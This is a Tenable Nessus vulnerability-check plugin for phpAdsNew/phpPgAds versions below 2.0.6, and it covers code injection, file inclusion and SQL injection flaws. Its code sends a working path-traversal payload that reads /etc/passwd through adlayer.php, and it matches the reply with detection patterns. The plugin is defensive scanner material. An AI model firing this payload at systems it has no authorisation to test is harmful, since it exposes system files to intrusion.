CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS
Percentile
84.0%
The remote host is running phpAdsNew / phpPgAds, an open source banner ad server.
The version of phpAdsNews / phpPgAds installed on the remote host suffers from several flaws :
Remote PHP Code Injection Vulnerability The XML-RPC library bundled with the application allows an attacker to inject arbitrary PHP code via the ‘adxmlrpc.php’ script to be executed within the context of the affected web server user id.
Multiple Local File Include Vulnerabilities The application fails to sanitize user-supplied input to the ‘layerstyle’ parameter of the ‘adlayer.php’ script and the ‘language’ parameter of the ‘admin/js-form.php’ script before using them to include PHP files for execution. An attacker can exploit these issues to read arbitrary local files provided PHP’s ‘magic_quotes’ directive is disabled.
SQL Injection Vulnerability An attacker can manipulate SQL queries via input to the ‘clientid’ parameter of the ‘libraries/lib-view-direct.inc.php’ script.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description) {
script_id(19518);
script_version("1.24");
script_cve_id("CVE-2005-2498", "CVE-2005-2635", "CVE-2005-2636");
script_bugtraq_id(
14560,
14583,
14588,
14584,
14591
);
script_name(english:"phpAdsNew / phpPgAds < 2.0.6 Multiple Vulnerabilities");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple vulnerabilities." );
script_set_attribute(attribute:"description", value:
"The remote host is running phpAdsNew / phpPgAds, an open source banner
ad server.
The version of phpAdsNews / phpPgAds installed on the remote host
suffers from several flaws :
- Remote PHP Code Injection Vulnerability
The XML-RPC library bundled with the application allows
an attacker to inject arbitrary PHP code via the
'adxmlrpc.php' script to be executed within the context
of the affected web server user id.
- Multiple Local File Include Vulnerabilities
The application fails to sanitize user-supplied input to
the 'layerstyle' parameter of the 'adlayer.php' script
and the 'language' parameter of the 'admin/js-form.php'
script before using them to include PHP files for
execution. An attacker can exploit these issues to read
arbitrary local files provided PHP's 'magic_quotes'
directive is disabled.
- SQL Injection Vulnerability
An attacker can manipulate SQL queries via input to the
'clientid' parameter of the
'libraries/lib-view-direct.inc.php' script." );
script_set_attribute(attribute:"see_also", value:"http://www.hardened-php.net/advisory_152005.67.html" );
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/408423/30/120/threaded" );
script_set_attribute(attribute:"solution", value:
"Upgrade to phpAdsNew / phpPgAds 2.0.6 or later." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_publication_date", value: "2005/08/29");
script_set_attribute(attribute:"vuln_publication_date", value: "2005/08/15");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:phpadsnew:phpadsnew");
script_end_attributes();
summary["english"] = "Checks for multiple vulnerabilities in phpAdsNew / phpPgAds < 2.0.6";
script_summary(english:summary["english"]);
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
script_require_keys("www/PHP");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);
# Loop through CGI directories.
foreach dir (cgi_dirs()) {
# Try to exploit the flaw in adlayer.php to read /etc/passwd.
r = http_send_recv3(method:"GET",
item:string(
dir, "/adlayer.php?",
"layerstyle=../../../../../../../etc/passwd%00"
),
port:port
);
if (isnull(r)) exit(0);
res = r[2];
# There's a problem if...
if (
# there's an entry for root or...
egrep(string:res, pattern:"root:.*:0:[01]:") ||
# we get an error saying "failed to open stream" or "Failed opening".
#
# nb: this suggests magic_quotes_gpc was enabled but the other flaws
# would still be present.
egrep(string:res, pattern:"Warning.+main\(.+/etc/passwd.+failed to open stream") ||
egrep(string:res, pattern:"Fatal error.+ Failed opening required '.+/etc/passwd")
) {
security_hole(port);
set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
exit(0);
}
}